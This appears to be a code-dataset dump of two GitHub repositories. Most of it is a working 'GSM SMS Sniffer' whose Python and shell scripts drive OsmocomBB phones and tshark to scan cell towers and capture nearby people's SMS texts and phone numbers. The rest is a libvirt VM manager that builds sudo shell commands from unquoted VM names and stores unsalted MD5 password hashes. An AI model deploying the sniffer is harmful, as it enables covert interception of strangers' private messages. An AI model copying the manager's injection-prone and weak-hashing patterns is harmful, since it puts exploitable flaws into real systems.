= gsm_sms[8+to_number_len+3+2+from_number_len + 3 + header_len + 1:]\n #print sms.encode('hex')\n\n # adjust string from big-endian to little-endian\n #sms_len = (len(sms) / 2)\n #sms = struct.unpack((\">\" + \"H\" * sms_len), sms)\n #sms = struct.pack(\"<\" + (\"H\" * sms_len), *sms)\n #print sms.encode('hex')\n\n #SMS is using utf-16 encode\n if not is_mms:\n print '[Msg*]:'+sms.decode('UTF-16BE')\n \n else:\n print \" MMS message.\" \n\n except:\n print \" Can't Decode The Message\" \n\n else:\n print \" SMS Status Report. \" \n\n except:\n print \" Unexpected packets format.\" \n\n\ndef GetCurrentTime():\n return time.strftime('%Y/%m/%d %H:%M:%S',time.localtime(time.time()))\n\ndef GetCurrentDate():\n\treturn time.strftime('%H:%M:%S',time.localtime(time.time()))\n\nif __name__ == '__main__':\n\n\tprint \"[L]Build by AC-GSM 05/05/2014\"\n\tprint \"[]Press Ctrl+C to Exit.\"\n\ttry:\n\n\t\tq = Queue.Queue()\n\t\tt = threading.Thread(target=handle_message, name=\"handle_message_thread\", kwargs={'messages':q})\n\t\tt.daemon = True\n\t\tt.start()\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#\t\ts.settimeout(5) \n\t\ts.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) \n# \t\ts.bind(('', UDP_PORT)) \n\t\ts.bind(('127.0.0.1', 4729)) \t\n\t\tprint '=' * 40\n\t\tprint \"[*]%s Start Monitor.\" % GetCurrentTime()\n\t\tprint \"[*]Enjoy GSM Sniffing!\"\n\t\twhile True:\n\n\t\t\tdata, addr = s.recvfrom(2048)\n#\t\t\tprint data.encode('hex')\n\n\t\t\tq.put(data)\n\t\ts.close()\n\n\texcept KeyboardInterrupt:\n\t\ttry:\n\n\t\t\tprint \"Game Over!.\"\n\t\texcept:\n\t\t\tpass\n"
},
{
"alpha_fraction": 0.6033519506454468,
"alphanum_fraction": 0.6089385747909546,
"avg_line_length": 15.272727012634277,
"blob_id": "6b9d0c3a2203644b5b7cc307550df5592075a04c",
"content_id": "f521a8e2231cffe534b7d1de4bbf39a2ef0b87a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 11,
"path": "/bin/run.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# 检查是否是root用户执行 \nsudo=\"\"\nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\necho -n \"请输入运行密码:\";\nfi\n#echo \"请输入运行密码:\"\n$sudo bash /root/gsm/bin/gsm.sh\n#bash /root/gsm/bin/gsm.sh\n"
},
{
"alpha_fraction": 0.6572580933570862,
"alphanum_fraction": 0.6653226017951965,
"avg_line_length": 23.774999618530273,
"blob_id": "6dd3da5b8654465e1fe201f9b640106453f258b5",
"content_id": "06ad8a7df43a9c71ce49042d460a2af53a3adf31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1460,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 40,
"path": "/readme.md",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "GSM SMS Sniffer\n===========\n\nGSMSniffer 借助 Osmocom-BB 平台,对2G网络短信嗅探抓取的一个Demo\n实现自动载入系统/扫描基站与抓取短信并存入数据库的过程\n项目公开代码为Python处理部分,完整框架演示可参考:\n\n### 文件说明\n=======\n```\n.\n├── bin(核心代码)\n│ ├── gsm.sh(主程序)\n│ ├── cell_log.sh(调用OsmocomBB扫描基站)\n│ ├── motoload.sh(调用OsmocomBB载入系统)\n│ ├── scan.sh(调用OsmocomBB扫描基站)\n│ ├── show.sh(调用OsmocomBB嗅探基站短信)\n│ ├── wireshark.sh(调用wireshark显示短信)\n├── gsmapp\n│ ├──cell_log (调用OsmocomBB扫描基站)\n│ ├── ccch_scan (调用OsmocomBB嗅探基站短信)\n│ ├── osmocom OsmocomBB载入系统)\n│ └── ini\n│ ├── .config.ini(app 配置文件)\n│ └── .wireshark(wireshark配置文件 Version 1.9.0 (SVN Rev Unknown from unknown))\n└── readme.md(项目说明)\n\n### 工具使用\n解压\n1. 用ln将需要的so文件链接到/usr/lib或者/lib这两个默认的目录下边 \nln -s /home/bin/wrieshark/lib/*.so /usr/lib \nsudo ldconfig \n2. 修改LD_LIBRARY_PATH \nexport LD_LIBRARY_PATH=/home/bin/wrieshark/lib:$LD_LIBRARY_PATH \nsudo ldconfig \n3. 修改/etc/ld.so.conf,然后刷新/etc/ld.so.conf \nvim /etc/ld.so.conf \nadd /home/bin/wrieshark/lib\nsudo ldconfig \n4. 修改 .ini 文件 到 /home/.ini\n\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5475475192070007,
"avg_line_length": 32.84745788574219,
"blob_id": "d6d18392cf2734a263caf1a5b2c8c7065f01c439",
"content_id": "6e91eb4468ffaf2aab8ae74c5e1f1d453180f566",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2114,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 59,
"path": "/bin/cell_log.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# usage: /home/gsm/typhon-vx/osmocom-bb-sylvain-burst_ind/src/host/layer23/src/misc/cell_log -s /tmp/osmocom_l2_1 -l - 2>&1 | bash gsm_parse_cell_log.sh\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nGSMNAPALMEXCOCODE=`cat \"$CONFIG\" | grep '^GSMNAPALMEXCOCODE=' | cut -d '=' -f 2`;\nGSMPACHER=`cat \"$CONFIG\" | wc -l`\nif [ \"$GSMNAPALMEXCOCODE\" -ne \"$GSMPACHER\" ];then\n\tzenity --error --text=\"非注册用户(error code 0x0f)\" --title=\"请注册\" --ok-label=\"关闭\";\n\techo \"error code 0x0f\";\n\texit 1;\nfi\n\n###==================================================================\n#maxcells=40\nmaxcells=`cat \"$CONFIG\" | grep '^GSMMAXCELLS=' | cut -d '=' -f 2`;\nif [ $# -eq 1 ]; then\n\tmaxcells=\"$1\"\nfi\n\ncurcells=0\necho \necho -e \" NO. ARFCN 强度 CID 服务商\";\necho \" ------------------------------------------\";\nwhile read line; do\n\tif echo $line|grep -q Cell; then\n\t\top=`echo \"$line\" | cut -d '(' -f 2 | cut -d ')' -f 1`\n\t\tarfcn=`echo \"$line\" | cut -d '=' -f 2 | cut -d ' ' -f 1`\n\t\tmcnc=`echo \"$line\" | sed -re \"s/^.* MCC=([0-9]{3}) MNC=([0-9]{2,3}).*$/\\1\\2/\"`\n\tfi\n\tif echo $line|grep -q \"^rxlev\"; then\n\t\trxlev=`echo \"$line\" | cut -d \" \" -f 2`\n\tfi\n\tif echo $line|grep -q \"^si3\"; then\n\t\tcid=$(printf \"%d\\n\" 0x`echo \"$line\" | cut -c 14,15,17,18`)\n\tfi\n\tif echo $line|grep -q si4; then\n\t\tif [ \"$op\" = \"China, China Unicom\" ];then\n\t\t\tmb=\"联通\"\n\t\telse\n\t\t\tmb=\"移动\"\n\t\tfi\n\t\tstdbuf -oL printf \" %4d> | %3d %4d | %d\" \"$((curcells+1))\" \"$arfcn\" \"$rxlev\" \"$cid\";\n\t\tstdbuf -oL printf \"%5c $mb \\n\";\n#\techo \"$((curcells+1)): $arfcn $rxlev ($mb $mcnc)\"\n#\t\techo \"$op;$mcnc;$arfcn;$cid;$rxlev\"\n\t\tlet curcells++\n\t\tif [ $curcells -ge $maxcells ]; then\n\t\t\t#echo \"[!]已超出默认最大显示数量$maxcells,如需要显示更多,请联系系统管理员!\"\n\t\t\tkillall -TERM cell_log # cell_log does not respond to sigpipe\n\t\t\texit 0\n\t\tfi\n\tfi\ndone\n\n"
},
{
"alpha_fraction": 0.5759637355804443,
"alphanum_fraction": 0.6145124435424805,
"avg_line_length": 30.5,
"blob_id": "7390120e77dc765c51d15eeb282110698cd70a63",
"content_id": "6a19f9e5a72475c343f1d4a5923b2b527a571b4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 14,
"path": "/bin/wireshark.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nWPATH=`cat \"$CONFIG\" | grep '^WHIRESHARK=' | cut -d '=' -f 2`;\nsudo=\"\"\nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\necho -n \"请输入运行密码:\";\nfi\n$sudo iptables -A INPUT -p UDP --dport 4729 -j DROP && $sudo $WPATH/wireshark -k -i lo -f 'port 4729'\n"
},
{
"alpha_fraction": 0.5192813277244568,
"alphanum_fraction": 0.5376862287521362,
"avg_line_length": 32.55882263183594,
"blob_id": "28242e4872320170d5d7616bd3480d404f64ffef",
"content_id": "884066c55a2c3f636fe0a9c6b4e2c25e16182ed8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2322,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 68,
"path": "/bin/show.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#sudo /home/gsm/wireshark-master/tshark -l $options -R gsm_sms -T fields -e gsmtap.uplink -e gsm_sms.tp-oa -e gsm_sms.tp-da -e gsm_sms.sms_text -e gsmtap.arfcn -e frame.time -e gsm_a.dtap.cld_party_bcd_num\n# $1 - input file, if empty\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nTSHPATH=`cat \"$CONFIG\" | grep '^WHIRESHARK=' | cut -d '=' -f 2`;\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nnu=1\nif [ ! -z \"$1\" ]; then\n\toptions=\"-r $1\";\n#\tsudo=\"\";\nelse\n\toptions=\"-i lo\";\n#\tsudo=\"sudo\";\t#ble\nfi\n\n# -e gsm_a.cld_party_bcd_num \n# this seems to be addr of sms gateway... not interesting with downlink\nsudo=\"\"\n# 检查是否是root用户执行 \nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\nfi\n$sudo $TSHPATH/tshark -l $options -R gsm_sms -T fields \\\n -e gsmtap.uplink -e gsm_sms.tp-oa -e gsm_sms.tp-da\\\n -e gsm_sms.sms_text\\\n -e gsmtap.arfcn -e frame.time -e gsm_a.dtap.cld_party_bcd_num 2>/dev/null \\\n| while read -r i; do\n\tlink=`echo \"$i\" | cut -c 1`;\n\tfrom=`echo \"$i\" | cut -d '\t' -f 2`;\n\tto=`echo \"$i\" | cut -d '\t' -f 3`;\n\ttext=`echo \"$i\" | cut -d '\t' -f 4`;\n\tarfcn=`echo \"$i\" | cut -d '\t' -f 5`;\n\ttime_=`echo \"$i\" | cut -d '\t' -f 6 | cut -c 14-22`;\n\tdtap=`echo \"$i\" | cut -d '\t' -f 7`;\n\tif [ \"$link\" == 1 ]; then\n\t\tlink='U';\n\telse\n\t\tlink='D';\n\tfi\n\tif [ \"$text\" == \"\" ]; then\n\t\ttext=\"Invalid MSG!!\";\n\tfi\n#\tmplayer -really-quiet /home/gsm/bin/a.wav 2>/dev/null &\n\tif [ \"$from\" != \"\" ] || [ \"$to\" != \"\" ]; then\n\t\tif [ \"$link\" == 'U' ]; then\n\t\techo \" ==============================[$nu]=================================\";\n\t\tstdbuf -oL printf \"[!]TIME:%s ARFCN:%3d TEL:%13s CenTel:%13s UP \\n\" \"$time_\" \"$arfcn\" \"$to\" \"$dtap\";\n#\t\tprintf \"MSG:%c $text\\n\";\n\t\t((nu++));\n\t\tstdbuf -oL printf \"[!]Msg:%c $text \\n\"\n#\t\techo -e \"Msg:\"$text;\n\t\tmplayer -really-quiet $GSMPATH/a.wav 2>/dev/null &\n\telse\n\t\techo \" ============================[$nu]===================================\";\n\t\tstdbuf -oL printf \"[*]Time:%s Arfcn:%3d Tel:%13s CenTel:%13s DOWN \\n\" \"$time_\" \"$arfcn\" \"$from\" \"$dtap\";\n\t\t((nu++));\n\t\tstdbuf -oL printf \"[*]Msg:%c $text \\n\"\n#\t\techo -e \"Msg:\"$text;\n#\t\tsleep 0.5;\n\t\tmplayer -really-quiet $GSMPATH/a.wav 2>/dev/null &\n\t\tfi\n\tfi\ndone\n"
},
{
"alpha_fraction": 0.5356850028038025,
"alphanum_fraction": 0.6127973794937134,
"avg_line_length": 21.574073791503906,
"blob_id": "636695c1a74eb416aeb534920805b4b6ab1cd822",
"content_id": "468d654e1ca129b43a82d0ee33a9d213b32602d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1235,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 54,
"path": "/bin/motoload.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#/bin/sh\n\n# motoload.sh\n# moded by 0x7678\n# Under GNU GPL \n\n# get config settings\nCONFIG=\"$HOME/.ini/config.ini\";\nGSMAPPATH=`cat \"$CONFIG\" | grep '^GSMAPATH=' | cut -d '=' -f 2`;\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"程序错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nif [ -z \"$1\" ]; then \n#\techo \"usage: $0 \\\"phone type\\\" [serial line] [l2_socket] [loader]\";\n#\techo \"suppoted phones: C115/C117/C123/C121/C118/C139/C140/C155\"\n#\techo \"example: $0 C139 /dev/ttyUSB2 /tmp/testsocket /tmp/testloader\"\n#\texit 0;\n\tmobile=C123;\nelse \n\tmobile=\"$1\"\nfi\n\nif [ -z \"$2\" ]; then \n\tstty=/dev/ttyUSB0; \nelse \n\tstty=\"$2\";\nfi\n\nif [ -z \"$3\" ]; then \n\tl2socket=\"\"; \nelse \n\tl2socket=\" -s $3\";\nfi\n\nif [ -z \"$4\" ]; then \n\tloader=\"\"; \nelse \n\tloader=\" -l $4\";\nfi\nid=`echo \"$stty\" | cut -b 12-`\ncase \"$mobile\" in \n\tC115|C117|C118|C119|C121|C123)\n\t\t# e88 \n\t\t# this is not ideal for C115 and C117,\n\t\t# but they seems to work..\n\t\techo -n \"Loading , press button on a phone...\";\n\t\txterm -T \"AC-GSM Channel [ $((id+1)) ] Data Windows\" -e \"$GSMAPPATH\"/osmocon $l2socket $loader -p \"$stty\" -m c123xor \"$GSMAPPATH\"/layer1.compalram.bin &\n\t\t;;\n\t*)\n\t\techo \"Unknown phone $1.\"\n\t\t;;\nesac\n"
}
] | 8 |
CuGBabyBeaR/pytxt2img
|
https://github.com/CuGBabyBeaR/pytxt2img
|
1d835036a14a122fbd82f3ac130bbbcff7cf28ea
|
979f0208327ad1768ec2e7cc240211c81dff8e8a
|
4bfe8a8e0a08fa59e16203866a159c4924013d52
|
refs/heads/master
| 2020-04-27T11:02:52.120833 | 2014-01-08T04:03:00 | 2014-01-08T04:03:00 | 15,706,718 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.545945942401886,
"alphanum_fraction": 0.5549549460411072,
"avg_line_length": 25.74698829650879,
"blob_id": "6c69b85fd0278af30fb9cdab93dd86297f2d7fb7",
"content_id": "316942f104a56654bc910d7225101026ad9bcd44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2220,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 83,
"path": "/txt2img.py",
"repo_name": "CuGBabyBeaR/pytxt2img",
"src_encoding": "UTF-8",
"text": "import codecs, ConfigParser \nfrom PIL import Image,ImageDraw,ImageFont\n\ndef main():\n # read configuration\n print 'read configuration'\n config = ConfigParser.ConfigParser()\n config.read('config.cfg')\n\n bg = config.get('input','background')\n content = config.get('input','content')\n encoding = config.get('input','encoding')\n fontname = config.get('input','fontname')\n\n left = int(config.get('output','left'))\n top = int(config.get('output','top'))\n width = int(config.get('output','width'))\n height = int(config.get('output','height'))\n fontsize = int(config.get('output','fontsize'))\n leading = int(config.get('output','leading'))\n lineHeight = fontsize + leading\n\n filename = config.get('output','name')\n filetype = config.get('output','type')\n\n font = ImageFont.truetype(fontname, fontsize)\n\n # read content\n print 'read content'\n f = codecs.open(content,'r',encoding)\n text = f.read()\n if text[0] == u'\\ufeff':\n text = text[1:]\n f.close()\n\n # text process\n print 'text process'\n wraptext = [u\"\\u3000\"]\n l = fontsize\n for t in text:\n fi = t\n delta = font.getsize(t)[0]\n if t == '\\n':\n wraptext += [u\"\\u3000\"]\n l = fontsize\n elif l + delta > width:\n wraptext += [t]\n l = delta\n else:\n wraptext[-1] += t\n l += delta\n\n\n # draw text and save\n ltop = top\n filecounter = 1\n pattern = \"%s%04d.%s\"\n filename = filename.split('.')\n\n img = Image.open(bg)\n draw = ImageDraw.Draw(img)\n\n for i, txt in enumerate(wraptext):\n if ltop + lineHeight > height:\n name = pattern % (filename[0],filecounter,filename[1])\n print 'saving \\\"%s\\\" ...' % name\n img.save(name, filetype)\n filecounter += 1\n img = Image.open(bg)\n draw = ImageDraw.Draw(img)\n ltop = top\n\n draw.text((left, ltop), txt, font=font, fill='black')\n ltop += lineHeight\n pass\n\n name = pattern % (filename[0],filecounter,filename[1])\n print 'saving \\\"%s\\\" ...' % name\n img.save(name, filetype)\n pass\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.65625,
"avg_line_length": 11,
"blob_id": "c32b794ae478f793e566f00fecd2b44a0d3f794e",
"content_id": "48053932acc31d553853906b37ba2cb4f6d60216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 8,
"path": "/README.md",
"repo_name": "CuGBabyBeaR/pytxt2img",
"src_encoding": "UTF-8",
"text": "pytxt2img\n==================\n\n这是一个将文本转换成图片的工具,支持自动换行和自定义设置。\n\n设置文件为`config.cfg`\n\nby: CuGBabyBeaR\n"
}
] | 2 |
yetyman/media-center-website
|
https://github.com/yetyman/media-center-website
|
d2acc838800a84922072fc51cfc9cec8ffec7712
|
3cd602c21aa68ce605b0ecc56e76aa5606cd8ef4
|
6d9d8cf79f96ec2dd8ae2b0c02efa3cd74f0435e
|
refs/heads/master
| 2021-09-04T03:09:48.962360 | 2018-01-15T03:46:52 | 2018-01-15T03:46:52 | 117,459,804 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4748971164226532,
"alphanum_fraction": 0.5580247044563293,
"avg_line_length": 44.730770111083984,
"blob_id": "6211d0c23545423399da37401bc48be21f924fd5",
"content_id": "5ec3bb283c8c5820d0309d1a04effbed622a9848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1215,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 26,
"path": "/entertainment_center.py",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "\"\"\"Calls code from fresh_tomatoes to generate and display a static webpage\"\"\"\r\nimport media\r\nimport fresh_tomatoes\r\n\r\n\r\ndef make_movies_list():\r\n \"\"\"generate a list of movies from hardcoded values\"\"\"\r\n itsjoke = media.Movie(\"its joke\",\r\n \"https://www.youtube.com/watch?v=D8cvgQJFDeo\",\r\n \"https://memes3.fjcdn.com/comments/Blank+_e3\"\r\n \"f147720c601dd7cb9e02fa45ca27b3.jpg\")\r\n theroom = media.Movie(\"oh hi mark\", \"https://www.youtube.com/watch?v=Z9cB\"\r\n \"0TjfIkM\",\r\n \"https://docs.python.org/2.7/_static/py.png\")\r\n knuckles = media.Movie(\"do u kno da wei?\", \"https://www.youtube.com/watch\"\r\n \"?v=H34qrTkhFz0\",\r\n \"https://i.guim.co.uk/img/media/794bb19154c0c0c3cf\"\r\n \"a2bc0b3f0e805f15cc2329/721_243_4595_2757/master/4\"\r\n \"595.jpg?w=1750&q=55&auto=format&usm=12&fit=max&s=\"\r\n \"654ed36d3271578f6317efa6786b93a4\")\r\n\r\n return [itsjoke, theroom, knuckles]\r\n\r\n\r\n# generating and opening the web page\r\nfresh_tomatoes.open_movies_page(make_movies_list())\r\n"
},
{
"alpha_fraction": 0.8012422323226929,
"alphanum_fraction": 0.8136646151542664,
"avg_line_length": 34.77777862548828,
"blob_id": "c15602f1317114e7aea2ed2fad6b8f900c713ed2",
"content_id": "7141fee254db3c246b65a1fa0dbeaaa3e3c80c5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 9,
"path": "/README.md",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "# media-center-website\na small project through Udacity, forking their fresh_tomatoes repo\n\nsimply clone the repository, run entertainment_center.py through a python interpreter and a website will be generated and opened\n\nall of my projects are available through GitHub at\nhttps://github.com/yetyman\n\nCopyright Jody Sowald 2018\n"
},
{
"alpha_fraction": 0.6465517282485962,
"alphanum_fraction": 0.6465517282485962,
"avg_line_length": 32.79999923706055,
"blob_id": "a8eac56beac179fa953d7ec1fe2fa029232c1968",
"content_id": "4b9f06be762619153a08377d22762f7dbf9b1885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 348,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 10,
"path": "/media.py",
"repo_name": "yetyman/media-center-website",
"src_encoding": "UTF-8",
"text": "\"\"\"defines media types\"\"\"\r\n\r\n\r\nclass Movie(object):\r\n \"\"\"a light container for movie as it pertains\r\n to the entertainment center module's usage\"\"\"\r\n def __init__(self, movie_title, movie_trailer, poster_url):\r\n self.title = movie_title\r\n self.trailer_youtube_url = movie_trailer\r\n self.poster_image_url = poster_url\r\n"
}
] | 3 |
SteveMcGrath/cugmanager
|
https://github.com/SteveMcGrath/cugmanager
|
ec063d2d1081027c243548dcc8be11912971c585
|
d9cbd7fc605581680d5d72c08e1f198006110f2c
|
291d080af3b06f40b2bbe491f35508495ad17ce5
|
refs/heads/master
| 2021-01-01T17:56:53.813812 | 2012-04-02T22:44:16 | 2012-04-02T22:44:16 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4496992826461792,
"alphanum_fraction": 0.4548933804035187,
"avg_line_length": 31.087718963623047,
"blob_id": "7ede7f91d354f7feec9b58604f19b0384acaf95d",
"content_id": "2ccdfa6f94b99fec293d74f9c191a41f112e408a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3658,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 114,
"path": "/admin.py",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n'''\nadmin.py\n\nCreated by Steven McGrath on 2012-03-23.\nCopyright (c) 2012 __MyCompanyName__. All rights reserved.\n'''\n\nfrom ConfigParser import ConfigParser\nimport os\nimport sys\nimport getopt\nimport cugmanager\n\n\nhelp_message = '''\nThe help message goes here.\n'''\n\n\nclass Usage(Exception):\n def __init__(self, msg):\n self.msg = msg\n\n\ndef main(argv=None):\n os.chdir(os.path.dirname(__file__))\n config = ConfigParser()\n config.read('cugmanager.conf')\n name = None\n action = None\n ram = config.getint('Defaults', 'ram')\n disk = config.getint('Defaults', 'disk')\n address = config.get('Defaults', 'address')\n netmask = config.get('Defaults', 'netmask')\n router = config.get('Defaults', 'router')\n if argv is None:\n argv = sys.argv\n try:\n try:\n opts, args = getopt.getopt(argv[1:], 'a:r:', \n ['add=', 'remove=', 'ram=', 'disk=',\n 'address=', 'netmask=', 'router=',\n ])\n except getopt.error, msg:\n raise Usage(msg)\n \n # option processing\n for option, value in opts:\n if option in ('-a', '--add'):\n action = 'add'\n name = value\n if option in ('-r', '--remove'):\n action = 'remove'\n name = value\n if option == '--ram':\n ram = int(value)\n if option == '--disk':\n disk = int(value)\n if option == '--address':\n address = value\n if option == '--netmask':\n netmask = value\n if option == '--router':\n router = value\n \n except Usage, err:\n print >> sys.stderr, sys.argv[0].split('/')[-1] + ': ' + str(err.msg)\n print >> sys.stderr, '\\t for help use --help'\n return 2\n \n if name is not None and action is not None:\n s = cugmanager.Session()\n try:\n vm = s.query(cugmanager.VirtualMachine).filter_by(name=name).one()\n except:\n vm = None\n \n if action == 'remove':\n if vm is not None:\n print 'Powering off, deleting, and undefining the VM...'\n vm.delete()\n print 'Removing the VM allotment from the database...'\n s.delete(vm)\n s.commit()\n print 'Allotment removal complete.'\n else:\n print 'No VM by that name to remove.'\n if action == 'add':\n if vm == None:\n print 'Creating a new VM allotment based on the following:'\n print ' RAM: %4d MB' % ram\n print ' Disk: %3d GB' % disk\n print 'IP Address: %s' % address\n print ' NetMask: %s' % netmask\n print ' Router IP: %s' % router\n \n vm = cugmanager.VirtualMachine(name=name, ram=ram, disk=disk,\n address=address,\n netmask=netmask,\n router=router)\n upw = vm.gen_upw()\n s.add(vm)\n s.commit()\n \n print '\\nLogin information for this VM will be:'\n print ' VM Name: %s' % vm.name\n print 'Password: %s' % upw\n else:\n print 'A VM Allotment by that name already exists!' \n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4959130883216858,
"alphanum_fraction": 0.49892449378967285,
"avg_line_length": 30.62925148010254,
"blob_id": "cb44e7024638146fe8eabd15e5b801b6ac302ac5",
"content_id": "e35cdb5926229f89f05f6fc7f7f5942a3a52f881",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9298,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 294,
"path": "/cugmanager.py",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom sqlalchemy import (Table, Column, Integer, String, DateTime, Date, \n ForeignKey, Text, Boolean, MetaData, \n and_, desc, create_engine)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import (backref, joinedload, subqueryload, sessionmaker,\n relationship)\nfrom ConfigParser import ConfigParser\nfrom commands import getoutput as run\nfrom hashlib import md5\nfrom random import choice\nimport string\nimport getpass\nimport cmd\nimport os\n\nconfig = ConfigParser()\nconfig.read('cugmanager.conf')\n\nBase = declarative_base()\nengine = create_engine('sqlite:///database.db')\nSession = sessionmaker(engine)\n\nclass VirtualMachine(Base):\n __tablename__ = 'vm'\n id = Column(Integer, primary_key=True)\n name = Column(Text, unique=True)\n ram = Column(Integer)\n disk = Column(Integer)\n address = Column(Text)\n netmask = Column(Text)\n router = Column(Text)\n passwd = Column(Text)\n upasswd = Column(Text)\n \n def start(self):\n run('sudo virsh start %s' % self.name)\n \n def stop(self):\n run('sudo virsh shutdown %s' % self.name)\n \n def restart(self):\n run('sudo virsh reboot %s' % self.name)\n \n def power(self):\n run('sudo virsh destroy %s' % self.name)\n \n def exists(self):\n if run('sudo virsh list --all | grep %s' % self.name) == '':\n return False\n else:\n return True\n \n def status(self):\n return run('sudo virsh domstate %s' % self.name).strip('\\n')\n \n def check_password(self, password):\n h = md5()\n h.update(password)\n return self.upasswd == h.hexdigest()\n \n def update_password(self, password):\n h = md5()\n h.update(password)\n self.upasswd = h.hexdigest()\n \n def gen_upw(self):\n upw = self._genpwd(length=12)\n self.update_password(upw)\n return upw\n \n def _genpwd(self, length=8, chars=string.letters + string.digits):\n return ''.join([choice(chars) for i in range(length)])\n \n def delete(self):\n if self.exists():\n self.power()\n run('sudo virsh undefine %s' % self.name)\n run('sudo lvremove -f %s/%s' % (config.get('Settings', 'lvpath'), \n self.name))\n \n def create(self, iso):\n if not self.exists():\n self.passwd = self._genpwd(length=12)\n opts = ['--autostart',\n #'--vnc',\n '--graphics vnc,password=%s' % self.passwd,\n '--noautoconsole',\n '--os-type=linux',\n '--accelerate',\n '--connect qemu:///system',\n '-n %s' % self.name,\n '--disk path=%s/%s,bus=virtio,cache=none' %\\\n (config.get('Settings', 'lvpath'), self.name),\n '--network bridge=%s' % config.get('Settings', 'network'),\n '--ram %s' % self.ram,\n '--cdrom %s/%s' % (config.get('Settings', 'iso_path'), iso),\n ]\n run('sudo lvcreate -L%sG -n %s %s' % (self.disk, \n self.name, \n config.get('Settings', 'vggroup')\n ))\n run('sudo /usr/local/bin/virt-install %s' % ' '.join(opts))\n \n def _iptables(self, allow=False):\n if self.console():\n rule = '-m state --state NEW -m tcp -p tcp --dport %s' % \\\n self.console()\n if allow:\n run('sudo iptables -D INPUT %s -j REJECT' % rule)\n #print run('iptables -A INPUT %s -j ACCEPT')\n return True\n else:\n #print run('iptables -D INPUT %s -j ACCEPT')\n run('sudo iptables -A INPUT %s -j REJECT' % rule)\n return True\n return False\n \n def enable_console(self):\n if self._iptables(allow=True):\n return True\n return False\n \n def disable_console(self):\n if self._iptables(allow=False):\n return True\n return False\n \n def console(self):\n display = run('sudo virsh vncdisplay %s' % self.name).strip('\\n')\\\n .strip(':')\n if display is not '':\n return int(display) + 5900\n return False\n \n 